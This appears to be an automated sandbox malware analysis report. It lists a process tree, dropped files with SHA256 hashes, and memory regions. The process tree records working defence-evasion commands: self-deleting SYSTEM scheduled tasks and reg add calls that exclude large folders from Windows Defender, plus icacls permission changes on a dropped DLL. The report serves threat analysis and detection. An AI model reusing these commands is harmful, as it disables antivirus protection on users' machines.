                                  PID:1608
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • System Location Discovery: System Language Discovery
                                PID:3116
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2852
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1560
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1684
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:3220
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\7AAHcm\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:4556
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                3⤵
                                • Executes a command shell one-liner
                                PID:400
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\7AAHcm\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:3368
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • System Location Discovery: System Language Discovery
                                PID:2444
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:1804
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                    PID:6088
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "Task1" /F
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3304
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                  3⤵
                                  • Indicator Removal: Clear Persistence
                                  • System Location Discovery: System Language Discovery
                                  PID:5108
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:256
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Run /TN "Task1"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4744
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "Task1" /F
                                    4⤵
                                      PID:5684
                              • C:\Users\Public\ubUHSK\2akOhw.exe
                                "C:\Users\Public\ubUHSK\2akOhw.exe"
                                1⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:1084
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\ubUHSK" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:2100
                                • C:\Windows\System32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\ubUHSK" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:2060
                              • C:\Windows\system32\cmd.exe
                                cmd.exe
                                1⤵
                                  PID:932
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:4576
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:5000
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:4448
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:4080
                                • C:\Program Files (x86)\7AAHcm\NoGF2e.exe
                                  "C:\Program Files (x86)\7AAHcm\NoGF2e.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:1332
                                • C:\Program Files (x86)\7AAHcm\NoGF2e.exe
                                  "C:\Program Files (x86)\7AAHcm\NoGF2e.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:988
                                • C:\Program Files (x86)\LbCG54y7\4MtW37.exe
                                  "C:\Program Files (x86)\LbCG54y7\4MtW37.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:5912
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\7AAHcm" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:3600
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\7AAHcm" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:2756
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:4396
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:5948
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:3320
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:5672
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:4236
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:2732
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:2740
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:3496

                                Network

                                      MITRE ATT&CK Enterprise v16

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      NoGF2e.exe

                                      • Path C:\Program Files (x86)\7AAHcm\NoGF2e.exe
                                      • Size 145KB
                                      • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      XPSPLOG.dll

                                      • Path C:\Program Files (x86)\7AAHcm\XPSPLOG.dll
                                      • Size 4.6MB
                                      • SHA256 2cf9ba1278625312b323683de97d8a221308c669546af610497c5c2c94c70d93
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      image.png

                                      • Path C:\Program Files (x86)\7AAHcm\image.png
                                      • Size 4.8MB
                                      • SHA256 5eee7739f13fd334b01a19889c483fc154d3ad6a0b359acd1695ef9dacc802d2
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      thumbs.db

                                      • Path C:\Program Files (x86)\7AAHcm\thumbs.db
                                      • Size 358KB
                                      • SHA256 fe42e58575cada5639201aed363c3470bfbd7cc054e8144c6f879de8b816a764
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      XPSPLOG.dll

                                      • Path C:\Program Files (x86)\LbCG54y7\XPSPLOG.dll
                                      • Size 4.6MB
                                      • SHA256 e81405dd98b3246d5206772712f0c716240e40d3682815ec332ce2d050d9ba6c
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      image.png

                                      • Path C:\Program Files (x86)\LbCG54y7\image.png
                                      • Size 4.8MB
                                      • SHA256 6426e2cd102b48c57efa1c242852f7486e9fdaf87ab165801efbdfaa4d3bae02
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      StartupProfileData-NonInteractive

                                      • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      • Size 1KB
                                      • SHA256 88d7b2c1b749ae947b33c9972f46f751bf953e67ed9c88e1ca184d7f174f350b
                                      • MD5 SHA1 SHA512 TLSH

                                      __PSScriptPolicyTest_txap0kjh.dyf.ps1

                                      • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_txap0kjh.dyf.ps1
                                      • Size 60B
                                      • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                      • MD5 SHA1 SHA512 TLSH

                                      destopbak.ini

                                      • Path C:\Users\Public\Music\destopbak.ini
                                      • Size 2B
                                      • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                      • MD5 SHA1 SHA512

                                      2akOhw.exe

                                      • Path C:\Users\Public\ubUHSK\2akOhw.exe
                                      • Size 135KB
                                      • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      UxEnhance64.dll

                                      • Path C:\Users\Public\ubUHSK\UxEnhance64.dll
                                      • Size 3.1MB
                                      • SHA256 7b825c7ee5ce44f0eef69905d40ac674866a06b337675fac6ad5e60d2a2ea6ea
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      adoresd.dat

                                      • Path C:\Users\Public\ubUHSK\adoresd.dat
                                      • Size 4.7MB
                                      • SHA256 2ba374ccc75c2701870c7a3bc458881be8715ada2ebf6a831bc80485e3c3944f
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      msadox.tb

                                      • Path C:\Users\Public\ubUHSK\msadox.tb
                                      • Size 8KB
                                      • SHA256 38be1ddd323057887ebebdf4e46c47b0601db8f34e3f9084ad26462c9f6b1344
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      xxxx.ini

                                      • Path \??\c:\xxxx.ini
                                      • Size 2B
                                      • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                      • MD5 SHA1 SHA512

                                      memory/988-740-0x0000000002FB0000-0x000000000378D000-memory.dmp

                                      memory/988-734-0x0000000000A20000-0x0000000000A21000-memory.dmp

                                      memory/988-763-0x0000000000A40000-0x0000000000A41000-memory.dmp

                                      memory/988-735-0x0000000074570000-0x0000000074CBA000-memory.dmp

                                      memory/988-764-0x0000000002FB0000-0x000000000378D000-memory.dmp

                                      memory/988-770-0x0000000000A20000-0x0000000000A21000-memory.dmp

                                      memory/1084-577-0x0000016D887E0000-0x0000016D89067000-memory.dmp

                                      memory/1084-580-0x0000016D887E0000-0x0000016D89067000-memory.dmp

                                      memory/1084-585-0x0000016D887E0000-0x0000016D89067000-memory.dmp

                                      memory/1084-586-0x0000016D887E0000-0x0000016D89067000-memory.dmp

                                      memory/1084-588-0x00007FF844050000-0x00007FF844052000-memory.dmp

                                      memory/1084-584-0x0000016D887E0000-0x0000016D89067000-memory.dmp

                                      memory/1084-587-0x0000016D887E0000-0x0000016D89067000-memory.dmp

                                      memory/1084-573-0x00007FF820D90000-0x00007FF8212AE000-memory.dmp

                                      memory/1084-579-0x00007FF844060000-0x00007FF844062000-memory.dmp

                                      memory/1332-723-0x0000000000900000-0x0000000000901000-memory.dmp

                                      memory/1332-748-0x0000000000900000-0x0000000000901000-memory.dmp

                                      memory/1332-745-0x00000000030F0000-0x00000000038CD000-memory.dmp

                                      memory/1332-744-0x0000000000920000-0x0000000000921000-memory.dmp

                                      memory/1332-738-0x00000000030F0000-0x00000000038CD000-memory.dmp

                                      memory/1332-724-0x0000000074570000-0x0000000074CBA000-memory.dmp

                                      memory/2888-544-0x0000024955620000-0x0000024955EA7000-memory.dmp

                                      memory/2888-567-0x0000024955620000-0x0000024955EA7000-memory.dmp

                                      memory/2888-531-0x00007FF844050000-0x00007FF844052000-memory.dmp

                                      memory/2888-532-0x00007FF820D90000-0x00007FF8212AE000-memory.dmp

                                      memory/2888-558-0x0000024954C00000-0x0000024954C4E000-memory.dmp

                                      memory/2888-560-0x0000024955F40000-0x0000024955FCA000-memory.dmp

                                      memory/2888-561-0x0000024955F40000-0x0000024955FCA000-memory.dmp

                                      memory/2888-551-0x0000024955620000-0x0000024955EA7000-memory.dmp

                                      memory/2888-547-0x0000024955620000-0x0000024955EA7000-memory.dmp

                                      memory/2888-546-0x0000024955620000-0x0000024955EA7000-memory.dmp

                                      memory/2888-545-0x0000024955620000-0x0000024955EA7000-memory.dmp

                                      memory/2888-538-0x0000024955620000-0x0000024955EA7000-memory.dmp

                                      memory/2888-566-0x0000024955620000-0x0000024955EA7000-memory.dmp

                                      memory/2888-559-0x0000024955F40000-0x0000024955FCA000-memory.dmp

                                      memory/2888-564-0x0000024955620000-0x0000024955EA7000-memory.dmp

                                      memory/2888-539-0x00007FF844060000-0x00007FF844062000-memory.dmp

                                      memory/2888-562-0x0000024955F40000-0x0000024955FCA000-memory.dmp

                                      memory/2888-540-0x0000024955620000-0x0000024955EA7000-memory.dmp

                                      memory/3076-592-0x0000014439CC0000-0x0000014439CE2000-memory.dmp

                                      memory/3076-597-0x000001443A0D0000-0x000001443A0DA000-memory.dmp

                                      memory/3076-596-0x0000014439F10000-0x0000014439FC2000-memory.dmp

                                      memory/3076-595-0x0000014439EF0000-0x0000014439F0E000-memory.dmp

                                      memory/3960-773-0x0000000002AC0000-0x0000000002AF6000-memory.dmp

                                      memory/3960-774-0x00000000057E0000-0x0000000005E2A000-memory.dmp

                                      memory/3960-804-0x0000000007850000-0x0000000007861000-memory.dmp

                                      memory/3960-803-0x00000000078D0000-0x0000000007966000-memory.dmp

                                      memory/3960-802-0x00000000076D0000-0x00000000076DA000-memory.dmp

                                      memory/3960-801-0x0000000007660000-0x000000000767A000-memory.dmp

                                      memory/3960-800-0x0000000007CA0000-0x000000000831C000-memory.dmp

                                      memory/3960-799-0x0000000007500000-0x00000000075A3000-memory.dmp

                                      memory/3960-798-0x00000000074A0000-0x00000000074C0000-memory.dmp

                                      memory/3960-795-0x0000000072B90000-0x0000000072BDC000-memory.dmp

                                      memory/3960-794-0x00000000074C0000-0x00000000074F6000-memory.dmp

                                      memory/3960-793-0x0000000006840000-0x000000000688C000-memory.dmp

                                      memory/3960-792-0x0000000005F90000-0x0000000005FAE000-memory.dmp

                                      memory/3960-788-0x0000000006020000-0x000000000637B000-memory.dmp

                                      memory/3960-786-0x0000000005E30000-0x0000000005E96000-memory.dmp

                                      memory/3960-785-0x00000000056E0000-0x0000000005746000-memory.dmp

                                      memory/3960-782-0x0000000005500000-0x0000000005522000-memory.dmp

                                      memory/4688-676-0x0000000001500000-0x0000000001501000-memory.dmp

                                      memory/4688-682-0x0000000003CC0000-0x000000000449D000-memory.dmp

                                      memory/4688-709-0x0000000003CC0000-0x000000000449D000-memory.dmp

                                      memory/4688-695-0x00000000018D0000-0x00000000018E4000-memory.dmp

                                      memory/4688-780-0x0000000003CC0000-0x000000000449D000-memory.dmp

                                      memory/4688-688-0x0000000003CC0000-0x000000000449D000-memory.dmp

                                      memory/4688-684-0x0000000003CC0000-0x000000000449D000-memory.dmp

                                      memory/4688-683-0x0000000001520000-0x0000000001521000-memory.dmp

                                      memory/4688-759-0x0000000003CC0000-0x000000000449D000-memory.dmp

                                      memory/4688-716-0x0000000010000000-0x0000000010061000-memory.dmp

                                      memory/4688-677-0x0000000074570000-0x0000000074CBA000-memory.dmp

                                      memory/4912-1-0x00000000007B0000-0x00000000007BC000-memory.dmp

                                      memory/4912-525-0x0000000000660000-0x000000000066E000-memory.dmp

                                      memory/4912-526-0x00007FF83B6B0000-0x00007FF83B6C2000-memory.dmp

                                      memory/4912-503-0x00007FF83B6B0000-0x00007FF83B6C2000-memory.dmp

                                      memory/4912-0-0x0000000000660000-0x000000000066E000-memory.dmp

                                      memory/5912-762-0x0000000072A20000-0x000000007316A000-memory.dmp

                                      memory/5912-761-0x0000000000C80000-0x0000000000C81000-memory.dmp

                                      memory/5912-775-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

                                      memory/5912-771-0x0000000003050000-0x000000000382D000-memory.dmp

                                      memory/5912-779-0x0000000000C80000-0x0000000000C81000-memory.dmp

                                      memory/5912-776-0x0000000003050000-0x000000000382D000-memory.dmp